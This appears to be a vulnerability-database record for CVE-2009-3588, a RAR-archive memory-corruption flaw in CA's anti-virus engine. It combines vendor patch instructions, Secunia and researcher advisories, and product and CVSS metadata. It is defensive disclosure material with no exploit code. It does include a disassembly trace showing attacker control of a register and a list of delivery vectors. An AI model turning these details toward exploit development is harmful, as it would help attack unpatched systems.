CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r11.1: apply fix # RO11964.
CA Common Services (CCS) r3.1: apply fix # RO11954.
CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 32bit: apply fix # RO10663.
CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 IA64: apply fix # RO10664.
CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 AMD64: apply fix # RO10665.
CA Secure Content Manager (formerly eTrust Secure Content Manager) r1.1: apply fix # RO10999.
CA Secure Content Manager (formerly eTrust Secure Content Manager) r8.0: apply fix # RO10999.
CA Anti-Virus Gateway (formerly eTrust Antivirus Gateway) 7.1: apply fix # RO11000.
CA Gateway Security r8.1: RO10999.
CA ARCserve for Windows Server component installed on a 64 bit machine: apply fixes # RO10663 and RO10664 (IA64) or RO10665 (AMD64).
CA ARCserve for Windows Server component installed on a 32 bit machine: apply fix # RO10663.
CA ARCserve for Windows Client Agent installed on a 64 bit machine: apply fix # RO10664 (IA64) or RO10665 (AMD64).
CA ARCserve for Windows Client Agent installed on a 32 bit machine: apply fix # RO10663.
CA ARCserve for Linux Server r11.5: apply fix # RO10729.
CA ARCserve for Linux:
-
Download RO10729.tar.Z from RO10729 into a temporary location /tmp/RO10729
-
Uncompress and untar RO10729.tar.Z as follows: uncompress RO10729.tar.Z tar -xvf RO10729.tar The new "libarclib.so" will be extracted to /tmp/RO10729
-
Change the directory to $CAIGLBL0000/ino/config as follows: cd $CAIGLBL0000/ino/config
-
Rename "libarclib.so" to "libarclib.so.RO10729" as follows: mv libarclib.so libarclib.so.RO10729
-
Copy the new libarclib.so as follows: cp /tmp/RO10729/libarclib.so $CAIGLBL0000/ino/config/
-
chmod +x $CAIGLBL0000/ino/config/libarclib.so
-
Stop the common agent (caagent stop)
-
Change the directory to ARCserve common agent directory (typically /opt/CA/BABcmagt) cd /opt/CA/BABcmagt Note: To find out the agent home directory run the following command: dirname 'ls -l /usr/bin/caagent |cut -f2 -d">"'
-
Save a copy of libarclib.so cp -p libarclib.so libarclib.so.RO10729
-
Copy over the new libarclib.so as follows: cp $/tmp/RO10729/libarclib.so.
-
Start the common agent (caagent start)
-
Repeat steps (7-11) on all remote Linux client agents' installations.
-
rm -rf /tmp/RO10729
Workaround
Do not open email attachments or download files from untrusted sources.
If additional information is required, please contact CA Support at http://support.ca.com/.
If you discover a vulnerability in CA products, please report your findings to the CA Product Vulnerability Response Team. support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782
Regards, Ken Williams, Director ; 0xE2941985 CA Product Vulnerability Response Team
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2009 CA. All rights reserved. ----------------------------------------------------------------------
Do you have VARM strategy implemented?
(Vulnerability Assessment Remediation Management)
If not, then implement it through the most reliable vulnerability intelligence source on the market.
Implement it through Secunia.
For more information visit: http://secunia.com/advisories/business_solutions/
Alternatively request a call from a Secunia representative today to discuss how we can help you with our capabilities contact us at: sales@secunia.com
TITLE: CA Anti-Virus Engine RAR Processing Two Vulnerabilities
SECUNIA ADVISORY ID: SA36976
VERIFY ADVISORY: http://secunia.com/advisories/36976/
DESCRIPTION: Two vulnerabilities have been reported in multiple CA products, which can be exploited by malicious people to cause a DoS (Denial of Service) or to potentially compromise a vulnerable system.
Successful exploitation may allow execution of arbitrary code.
Please see the vendor's advisory for detailed instructions on applying patches.
PROVIDED AND/OR DISCOVERED BY: The vendor credits Thierry Zoller.
ORIGINAL ADVISORY: CA20091008-01: https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=218878
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. Background ~~~~~~~~~~~~~ Quote: "CA is one of the world's largest IT management software providers. We serve more than 99% of Fortune 1000 companies, as well as government entities, educational institutions and thousands of other companies in diverse industries worldwide"
"CA Anti-Virus for the Enterprise is the next generation in comprehensive anti-virus security for business PCs, servers and PDAs. It combines proactive protection against malware with new, powerful management features that stop and remove malicious code before it enters your network, reducing system downtime"
II.
Attacker has control over EBX :
Basic Block: 6e4305b0 mov cl,byte ptr [ebx] Tainted Input Operands: ebx 6e4305b2 add edi,28h 6e4305b5 push edi 6e4305b6 lea edx,[esp+14h] 6e4305ba mov byte ptr [esp+14h],cl Tainted Input Operands: cl 6e4305be inc ebx Tainted Input Operands: ebx 6e4305bf push edx 6e4305c0 mov ecx,esi 6e4305c2 mov dword ptr [esp+1ch],ebx Tainted Input Operands: ebx 6e4305c6 call arclib!arctkopenarchive+0x283a0 (6e42f9f0)
III. Due to the nature of Anti-virus products, the attack vectors can be near endless. An attack could be done over the way of an E-mail message carrying an RAR attachment (of a file recognised as being RAR), USB, CD, Network data etc.
Please note that this is a general problem and not exclusive to Computer Associates.
IV. Disclosure timeline ~~~~~~~~~~~~~~~~~~~~~~~~~ DD.MM.YYYY 11.05.2009 - Reported CVE-2009-3587 03.06.2009 - Reported CVE-2009-3588 09.10.2009 - CA releases advisory https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=218878 13.10.2009 - G-SEC releases advisory
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200910-0097",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "anti-virus plus",
"scope": "eq",
"trust": 1.8,
"vendor": "ca",
"version": "2009"
},
{
"model": "arcserve backup",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "r11.1"
},
{
"model": "arcserve backup",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "r11.5"
},
{
"model": "etrust anti-virus gateway",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "7.1"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r3.1"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r11.1"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "arcserve for windows client agent",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "internet security suite plus 2009",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r8.1"
},
{
"model": "threat manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r8"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "anti-virus sdk",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "*"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.0"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "8.0"
},
{
"model": "internet security suite 2008",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "protection suites",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r2"
},
{
"model": "etrust integrated threat management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.1"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r7.1"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "3.0"
},
{
"model": "secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.1"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11"
},
{
"model": "etrust anti-virus sdk",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r8"
},
{
"model": "threat manager total defense",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2008"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8"
},
{
"model": "network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r3.0"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "*"
},
{
"model": "gateway security",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r8.1"
},
{
"model": "arcserve for windows server component",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r12.0"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "3.1"
},
{
"model": "network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r11"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2009"
},
{
"model": "protection suites",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r3.1"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2007"
},
{
"model": "protection suites",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r3"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"model": "anti-virus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "7.1"
},
{
"model": "internet security suite plus 2008",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.0"
},
{
"model": "threat manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "8.1"
},
{
"model": "anti-virus",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "anti-virus for the enterprise",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "anti-virus gateway",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "anti-virus sdk",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "arcserve backup",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "arcserve for windows client agent",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "arcserve for windows server component",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "common services",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "etrust intrusion detection",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "gateway security",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "internet security suite",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "internet security suite plus 2008",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "internet security suite plus 2009",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "network and systems management",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "protection suites",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "secure content manager",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "threat manager for the enterprise",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "threat manager total defense",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "etrust ez antivirus",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "arcserve backup",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "r12.0"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "7.1"
},
{
"model": "arcserve backup",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "r12.5"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "7.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates threat manager total defense",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates threat manager for the enterprise r8.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates threat manager for the enterprise r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates protection suites r2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates protection suites r3",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates protection suites",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates internet security suite plus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20090"
},
{
"model": "associates internet security suite plus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20080"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20080"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20073.0"
},
{
"model": "associates gateway security",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates etrust intrusion detection sp",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.01"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates etrust intrusion detection sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0.0"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates common services r11.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates common services r11",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates common services",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "12.5"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "12.0"
},
{
"model": "associates brightstor arcserve backup r12.0 windows sp1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates arcserve backup for linux sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for linux sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for linux sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for linux ga",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for linux sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for linux sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for linux sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for linux ga",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates anti-virus sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates anti-virus gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates anti-virus for the enterprise r8.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates anti-virus for the enterprise r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates anti-virus for the enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates anti-virus plus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20090"
},
{
"model": "associates anti-virus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20090"
},
{
"model": "associates anti-virus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20078"
},
{
"model": "associates anti-virus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2008"
}
],
"sources": [
{
"db": "BID",
"id": "36653"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002629"
},
{
"db": "CNNVD",
"id": "CNNVD-200910-200"
},
{
"db": "NVD",
"id": "CVE-2009-3588"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:ca:etrust_antivirus",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:anti-virus_for_the_enterprise",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:anti-virus_gateway",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:anti-virus_plus",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:anti-virus_sdk",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:arcserve_backup",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:arcserve_for_windows_client_agent",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:arcserve_for_windows_server_component",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:common_services",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:etrust_intrusion_detection",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:gateway_security",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:internet_security_suite",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:internet_security_suite_plus_2008",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:internet_security_suite_plus_2009",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:network_and_systems_management",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:protection_suites",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:secure_content_manager",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:threat_manager_for_the_enterprise",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:threat_manager_total_defense",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ca:etrust_ez_antivirus",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-002629"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Thierry Zoller",
"sources": [
{
"db": "BID",
"id": "36653"
},
{
"db": "PACKETSTORM",
"id": "81986"
},
{
"db": "CNNVD",
"id": "CNNVD-200910-200"
}
],
"trust": 1.0
},
"cve": "CVE-2009-3588",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2009-3588",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-41034",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2009-3588",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2009-3588",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-200910-200",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-41034",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-41034"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002629"
},
{
"db": "CNNVD",
"id": "CNNVD-200910-200"
},
{
"db": "NVD",
"id": "CVE-2009-3588"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unspecified vulnerability in the arclib component in the Anti-Virus engine in CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 through r8.1; Anti-Virus 2007 (v8) through 2009; eTrust EZ Antivirus r7.1; Internet Security Suite 2007 (v3) through Plus 2009; and other CA products allows remote attackers to cause a denial of service via a crafted RAR archive file that triggers stack corruption, a different vulnerability than CVE-2009-3587. This vulnerability CVE-2009-3587 Is a different vulnerability.Skillfully crafted by a third party RAR Service disruption via archive files (DoS) There is a possibility of being put into a state. Multiple Computer Associates products are prone to memory-corruption vulnerabilities that affect the Anti-Virus engine. \nAn attacker can exploit these issues to execute arbitrary code in the context of the affected applications or cause denial-of-service conditions. \nThe issues affect the Anti-Virus engine with versions prior to \u0027arclib\u0027 8.1.4.0. Computer Associates is the world\u0027s leading security vendor, products include a variety of anti-virus software and backup recovery systems. \nCA20091008-01: Security Notice for CA Anti-Virus Engine\n\n\nIssued: October 8, 2009\n\n\nCA\u0027s support is alerting customers to multiple security risks \nassociated with CA Anti-Virus Engine. Vulnerabilities exist in \nthe arclib component that can allow a remote attacker to cause a \ndenial of service, or to cause heap corruption and potentially \nfurther compromise a system. CA has issued fixes to address the \nvulnerabilities. An attacker can create a \nmalformed RAR archive file that results in heap corruption and \nallows the attacker to cause a denial of service or possibly \nfurther compromise the system. An attacker can create a \nmalformed RAR archive file that results in stack corruption and \nallows the attacker to cause a denial of service. \n\n\nRisk Rating\n\nMedium\n\n\nPlatform\n\nWindows\nUNIX\nLinux\nSolaris\nMac OS X\nNetware\n\n\nAffected Products\n\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8.1\nCA Anti-Virus 2007 (v8)\nCA Anti-Virus 2008\nCA Anti-Virus 2009\nCA Anti-Virus Plus 2009\neTrust EZ Antivirus r7.1\nCA Internet Security Suite 2007 (v3)\nCA Internet Security Suite 2008\nCA Internet Security Suite Plus 2008\nCA Internet Security Suite Plus 2009\nCA Threat Manager for the Enterprise (formerly eTrust Integrated \n Threat Management) r8\nCA Threat Manager for the Enterprise (formerly eTrust Integrated \n Threat Management) 8.1\nCA Threat Manager Total Defense\nCA Gateway Security r8.1\nCA Protection Suites r2\nCA Protection Suites r3\nCA Protection Suites r3.1\nCA Secure Content Manager (formerly eTrust Secure Content \n Manager) 1.1\nCA Secure Content Manager (formerly eTrust Secure Content \n Manager) 8.0\nCA Network and Systems Management (NSM) (formerly Unicenter \n Network and Systems Management) r3.0\nCA Network and Systems Management (NSM) (formerly Unicenter \n Network and Systems Management) r3.1\nCA Network and Systems Management (NSM) (formerly Unicenter \n Network and Systems Management) r11\nCA Network and Systems Management (NSM) (formerly Unicenter \n Network and Systems Management) r11.1\nCA ARCserve Backup r11.5 on Windows\nCA ARCserve Backup r12 on Windows\nCA ARCserve Backup r12.0 SP1 on Windows\nCA ARCserve Backup r12.0 SP 2 on Windows\nCA ARCserve Backup r12.5 on Windows\nCA ARCserve Backup r11.1 Linux\nCA ARCserve Backup r11.5 Linux\nCA ARCserve for Windows Client Agent\nCA ARCserve for Windows Server component\nCA eTrust Intrusion Detection 2.0 SP1\nCA eTrust Intrusion Detection 3.0\nCA eTrust Intrusion Detection 3.0 SP1\nCA Common Services (CCS) r3.1\nCA Common Services (CCS) r11\nCA Common Services (CCS) r11.1\nCA Anti-Virus SDK (formerly eTrust Anti-Virus SDK)\nCA Anti-Virus Gateway (formerly eTrust Antivirus Gateway) 7.1\n\n\nNon-Affected Products\n\nCA Anti-Virus engine with arclib version 8.1.4.0 or later \ninstalled\n\n\nHow to determine if the installation is affected\n\nFor products on 